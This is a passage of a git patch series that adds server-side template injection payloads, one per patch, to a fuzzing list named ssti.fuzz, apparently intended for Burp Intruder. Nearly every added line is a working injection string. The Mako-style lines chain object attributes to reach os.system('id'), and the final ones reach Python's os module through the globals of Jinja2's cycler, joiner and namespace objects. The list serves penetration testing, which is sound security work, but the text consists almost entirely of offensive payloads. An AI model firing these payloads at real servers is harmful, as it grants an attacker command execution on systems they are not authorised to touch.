a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 51f09e0..cc277fa 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -77,3 +77,4 @@ ${self.module.cache.util.compat.inspect.linecache.os.system("id")} ${self.template.module.runtime.util.compat.inspect.os.system("id")} ${self.module.runtime.util.compat.inspect.linecache.os.system("id")} ${self.module.runtime.exceptions.traceback.linecache.os.system("id")} +${self.module.runtime.exceptions.util.compat.inspect.os.system("id")} From 87ae86dcf97bc1aac4c50382421abc6260af11fb Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 33/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index cc277fa..060aeee 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -78,3 +78,4 @@ ${self.template.module.runtime.util.compat.inspect.os.system("id")} ${self.module.runtime.util.compat.inspect.linecache.os.system("id")} ${self.module.runtime.exceptions.traceback.linecache.os.system("id")} ${self.module.runtime.exceptions.util.compat.inspect.os.system("id")} +${self.template._mmarker.module.cache.compat.inspect.os.system("id")} From 246021fcd54292a77f7c4d402fc8b3c1f77bf9af Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 34/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 060aeee..6aae7c5 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -79,3 +79,4 @@ ${self.module.runtime.util.compat.inspect.linecache.os.system("id")} ${self.module.runtime.exceptions.traceback.linecache.os.system("id")} ${self.module.runtime.exceptions.util.compat.inspect.os.system("id")} ${self.template._mmarker.module.cache.compat.inspect.os.system("id")} +${self.template.module.cache.compat.inspect.linecache.os.system("id")} From c923e50c6f0717e929295d4bf5c774d1d76009ab Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 35/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 6aae7c5..30151d6 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -80,3 +80,4 @@ ${self.module.runtime.exceptions.traceback.linecache.os.system("id")} ${self.module.runtime.exceptions.util.compat.inspect.os.system("id")} ${self.template._mmarker.module.cache.compat.inspect.os.system("id")} ${self.template.module.cache.compat.inspect.linecache.os.system("id")} +${self.attr._NSAttr__parent.template.module.cache.util.os.system("id")} From 2b620c3490d72c8c9548687d68092d871caafab7 Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 36/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 30151d6..508aaff 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -81,3 +81,4 @@ ${self.module.runtime.exceptions.util.compat.inspect.os.system("id")} ${self.template._mmarker.module.cache.compat.inspect.os.system("id")} ${self.template.module.cache.compat.inspect.linecache.os.system("id")} ${self.attr._NSAttr__parent.template.module.cache.util.os.system("id")} +${self.template._mmarker.module.filters.compat.inspect.os.system("id")} From 5161a1df40312b9f3b561e70a8cf03008b30be5d Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 37/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 508aaff..3a6ae00 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -82,3 +82,4 @@ ${self.template._mmarker.module.cache.compat.inspect.os.system("id")} ${self.template.module.cache.compat.inspect.linecache.os.system("id")} ${self.attr._NSAttr__parent.template.module.cache.util.os.system("id")} ${self.template._mmarker.module.filters.compat.inspect.os.system("id")} +${self.template._mmarker.module.runtime.compat.inspect.os.system("id")} From 3a82a104bca944c478a7fa950a50ba5b72eb0455 Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 38/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 3a6ae00..8712ea5 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -83,3 +83,4 @@ ${self.template.module.cache.compat.inspect.linecache.os.system("id")} ${self.attr._NSAttr__parent.template.module.cache.util.os.system("id")} ${self.template._mmarker.module.filters.compat.inspect.os.system("id")} ${self.template._mmarker.module.runtime.compat.inspect.os.system("id")} +${self.attr._NSAttr__parent.module.cache.compat.inspect.os.system("id")} From 861c5453499b5b45b16a93a8750c639de20bb0e3 Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 39/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 8712ea5..929b6a4 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -84,3 +84,4 @@ ${self.attr._NSAttr__parent.template.module.cache.util.os.system("id")} ${self.template._mmarker.module.filters.compat.inspect.os.system("id")} ${self.template._mmarker.module.runtime.compat.inspect.os.system("id")} ${self.attr._NSAttr__parent.module.cache.compat.inspect.os.system("id")} +${self.template._mmarker.module.runtime.exceptions.util.os.system("id")} From 11478b6993dce83f27d8087a2f2fa354a7a62385 Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 40/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 929b6a4..c56e463 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -85,3 +85,4 @@ ${self.template._mmarker.module.filters.compat.inspect.os.system("id")} ${self.template._mmarker.module.runtime.compat.inspect.os.system("id")} ${self.attr._NSAttr__parent.module.cache.compat.inspect.os.system("id")} ${self.template._mmarker.module.runtime.exceptions.util.os.system("id")} +${self.template.module.filters.compat.inspect.linecache.os.system("id")} From ebc1876c643fe1c1cc889798d89a7e14a978df37 Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 41/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index c56e463..15dc32a 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -86,3 +86,4 @@ ${self.template._mmarker.module.runtime.compat.inspect.os.system("id")} ${self.attr._NSAttr__parent.module.cache.compat.inspect.os.system("id")} ${self.template._mmarker.module.runtime.exceptions.util.os.system("id")} ${self.template.module.filters.compat.inspect.linecache.os.system("id")} +${self.template.module.runtime.compat.inspect.linecache.os.system("id")} From 9ccd1e4e71e6465532a04ac577c9c4ca0e36ff8f Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 42/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 15dc32a..103920b 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -87,3 +87,4 @@ ${self.attr._NSAttr__parent.module.cache.compat.inspect.os.system("id")} ${self.template._mmarker.module.runtime.exceptions.util.os.system("id")} ${self.template.module.filters.compat.inspect.linecache.os.system("id")} ${self.template.module.runtime.compat.inspect.linecache.os.system("id")} +${self.attr._NSAttr__parent.template.module.runtime.util.os.system("id")} From 7a2af52709c6aa68b05b0ea4947b3451a13e5e45 Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 43/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 103920b..ea99e55 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -88,3 +88,4 @@ ${self.template._mmarker.module.runtime.exceptions.util.os.system("id")} ${self.template.module.filters.compat.inspect.linecache.os.system("id")} ${self.template.module.runtime.compat.inspect.linecache.os.system("id")} ${self.attr._NSAttr__parent.template.module.runtime.util.os.system("id")} +${self.context._with_template._mmarker.module.cache.util.os.system("id")} From 557759569901c92fbfd9b8fcabcf234bb7bd919b Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 44/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index ea99e55..6c15f9f 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -89,3 +89,4 @@ ${self.template.module.filters.compat.inspect.linecache.os.system("id")} ${self.template.module.runtime.compat.inspect.linecache.os.system("id")} ${self.attr._NSAttr__parent.template.module.runtime.util.os.system("id")} ${self.context._with_template._mmarker.module.cache.util.os.system("id")} +${self.template.module.runtime.exceptions.compat.inspect.os.system("id")} From 520249a7490ed6cd56f46d7548ce8dd981a5c556 Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 45/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 6c15f9f..3667028 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -90,3 +90,4 @@ ${self.template.module.runtime.compat.inspect.linecache.os.system("id")} ${self.attr._NSAttr__parent.template.module.runtime.util.os.system("id")} ${self.context._with_template._mmarker.module.cache.util.os.system("id")} ${self.template.module.runtime.exceptions.compat.inspect.os.system("id")} +${self.attr._NSAttr__parent.module.filters.compat.inspect.os.system("id")} From 154c07780c2c83986c6d54867d1f2fe99d219c0a Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 46/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 3667028..a594f07 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -91,3 +91,4 @@ ${self.attr._NSAttr__parent.template.module.runtime.util.os.system("id")} ${self.context._with_template._mmarker.module.cache.util.os.system("id")} ${self.template.module.runtime.exceptions.compat.inspect.os.system("id")} ${self.attr._NSAttr__parent.module.filters.compat.inspect.os.system("id")} +${self.attr._NSAttr__parent.module.runtime.compat.inspect.os.system("id")} From 19214a7db411355f8d51ce5779cbd123a7f34613 Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 47/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index a594f07..7714929 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -92,3 +92,4 @@ ${self.context._with_template._mmarker.module.cache.util.os.system("id")} ${self.template.module.runtime.exceptions.compat.inspect.os.system("id")} ${self.attr._NSAttr__parent.module.filters.compat.inspect.os.system("id")} ${self.attr._NSAttr__parent.module.runtime.compat.inspect.os.system("id")} +${self.context._with_template.module.cache.compat.inspect.os.system("id")} From 5518c143883f939c87f3a968d545f4944d8278c5 Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 48/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 7714929..d6ee02f 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -93,3 +93,4 @@ ${self.template.module.runtime.exceptions.compat.inspect.os.system("id")} ${self.attr._NSAttr__parent.module.filters.compat.inspect.os.system("id")} ${self.attr._NSAttr__parent.module.runtime.compat.inspect.os.system("id")} ${self.context._with_template.module.cache.compat.inspect.os.system("id")} +${self.module.runtime.exceptions.compat.inspect.linecache.os.system("id")} From 4345789297de7270070df6ef27b3b752a03fe795 Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 49/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index d6ee02f..05947d1 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -94,3 +94,4 @@ ${self.attr._NSAttr__parent.module.filters.compat.inspect.os.system("id")} ${self.attr._NSAttr__parent.module.runtime.compat.inspect.os.system("id")} ${self.context._with_template.module.cache.compat.inspect.os.system("id")} ${self.module.runtime.exceptions.compat.inspect.linecache.os.system("id")} +${self.attr._NSAttr__parent.module.runtime.exceptions.util.os.system("id")} From d7faae081de4ed2ab3937f32cc0e141b1fa5e72e Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 50/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 05947d1..3565204 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -95,3 +95,4 @@ ${self.attr._NSAttr__parent.module.runtime.compat.inspect.os.system("id")} ${self.context._with_template.module.cache.compat.inspect.os.system("id")} ${self.module.runtime.exceptions.compat.inspect.linecache.os.system("id")} ${self.attr._NSAttr__parent.module.runtime.exceptions.util.os.system("id")} +${self.context._with_template._mmarker.module.runtime.util.os.system("id")} From 9a63827cdbb75df4ba5aab92d24f55ef03b88d37 Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 51/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 3565204..3e21e53 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -96,3 +96,4 @@ ${self.context._with_template.module.cache.compat.inspect.os.system("id")} ${self.module.runtime.exceptions.compat.inspect.linecache.os.system("id")} ${self.attr._NSAttr__parent.module.runtime.exceptions.util.os.system("id")} ${self.context._with_template._mmarker.module.runtime.util.os.system("id")} +${self.context._with_template.module.filters.compat.inspect.os.system("id")} From 4313b4f373c7d9abe3982af25f9faefcf64270b9 Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 52/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 3e21e53..9a23351 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -97,3 +97,4 @@ ${self.module.runtime.exceptions.compat.inspect.linecache.os.system("id")} ${self.attr._NSAttr__parent.module.runtime.exceptions.util.os.system("id")} ${self.context._with_template._mmarker.module.runtime.util.os.system("id")} ${self.context._with_template.module.filters.compat.inspect.os.system("id")} +${self.context._with_template.module.runtime.compat.inspect.os.system("id")} From 24b2676f97b8ee9689b45860268f13c82919a38d Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 53/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 9a23351..d434714 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -98,3 +98,4 @@ ${self.attr._NSAttr__parent.module.runtime.exceptions.util.os.system("id")} ${self.context._with_template._mmarker.module.runtime.util.os.system("id")} ${self.context._with_template.module.filters.compat.inspect.os.system("id")} ${self.context._with_template.module.runtime.compat.inspect.os.system("id")} +${self.context._with_template.module.runtime.exceptions.util.os.system("id")} From bb65411c6276df065265f739d3fdd78153cf465b Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 54/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index d434714..03df55d 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -99,3 +99,4 @@ ${self.context._with_template._mmarker.module.runtime.util.os.system("id")} ${self.context._with_template.module.filters.compat.inspect.os.system("id")} ${self.context._with_template.module.runtime.compat.inspect.os.system("id")} ${self.context._with_template.module.runtime.exceptions.util.os.system("id")} +${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")} From 8482f742ffdc7d3185a9a96a7e95fb6acba03bdd Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 55/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 03df55d..ab8269c 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -100,3 +100,4 @@ ${self.context._with_template.module.filters.compat.inspect.os.system("id")} ${self.context._with_template.module.runtime.compat.inspect.os.system("id")} ${self.context._with_template.module.runtime.exceptions.util.os.system("id")} ${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")} +{{self._TemplateReference__context.cycler.__init__.__globals__.os}} From 861d13780b41bc6fb0d05e91809a2fa2201fb8ed Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 56/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index ab8269c..c2391a6 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -101,3 +101,4 @@ ${self.context._with_template.module.runtime.compat.inspect.os.system("id")} ${self.context._with_template.module.runtime.exceptions.util.os.system("id")} ${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")} {{self._TemplateReference__context.cycler.__init__.__globals__.os}} +{{self._TemplateReference__context.joiner.__init__.__globals__.os}} From 704a7415cf51a44ed92628f53c465a6b24066eaa Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 57/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index c2391a6..216e040 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -102,3 +102,4 @@ ${self.context._with_template.module.runtime.exceptions.util.os.system("id")} ${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")} {{self._TemplateReference__context.cycler.__init__.__globals__.os}} {{self._TemplateReference__context.joiner.__init__.__globals__.os}} +{{self._TemplateReference__context.namespace.__init__.__globals__.os}} From e65c5ed29111dc310582b1c370323d3c6bec5071 Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 58/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 216e040..ec0ef2c 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -103,3 +103,4 @@ ${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")} {{self._TemplateReference__context.cycler.__init__.__globals__.os}} {{self._TemplateReference__context.joiner.__init__.__globals__.os}} {{self._TemplateReference__context.namespace.__init__.__globals__.os}} +{{cycler.__init__.__globals__.os}} From 36dc8742c1692ceea7c950ca932838e624bc432b Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 59/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index ec0ef2c..86cfd9b 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -104,3 +104,4 @@ ${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")} {{self._TemplateReference__context.joiner.__init__.__globals__.os}} {{self._TemplateReference__context.namespace.__init__.__globals__.os}} {{cycler.__init__.__globals__.os}} +{{joiner.__init__.__globals__.os}} From 9ce58c14ef59a26bd44a85d12bfc3a30dab64254 Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 60/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 86cfd9b..97f5356 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -105,3 +105,4 @@ ${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")} {{self._TemplateReference__context.namespace.__init__.__globals__.os}} {{cycler.__init__.__globals__.os}} {{joiner.__init__.__globals__.os}} +{{namespace.__init__.__globals__.os}}